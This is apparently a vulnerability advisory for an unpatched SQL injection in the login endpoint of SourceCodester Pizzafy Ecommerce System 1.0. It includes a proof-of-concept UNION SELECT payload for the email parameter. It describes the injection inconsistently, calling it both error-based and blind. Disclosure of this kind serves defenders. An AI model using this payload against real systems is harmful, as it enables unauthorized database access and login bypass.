# Vulnerability Summary ## Overview - **Vulnerability Name**: SourceCodester Pizzafy Ecommerce System 1.0 SQL Injection - **Vulnerability Type**: SQL Injection (Based Error) - **Severity**: HIGH - **Status**: Unpatched ## Impact Scope - **Affected Version**: 1.0 - **Vulnerable Endpoint**: `POST /pizza/admin/ajax.php?action=login` - **Description**: A blind-based SQL injection vulnerability was identified in the SELECT functionality of the Pizzafy Ecommerce system. Due to improper sanitization of the email parameter, attackers can inject malicious SQL commands into backend database queries. ## Remediation - **Current Status**: Unpatched ## POC Code ```plaintext email=-1' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100-- - ``` ## References - [SourceCodester Pizzafy Ecommerce System](https://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html) - [GitHub Submission](https://github.com/ferrando-mengali/vulhub-submissions/blob/main/03-val-SQLi.md)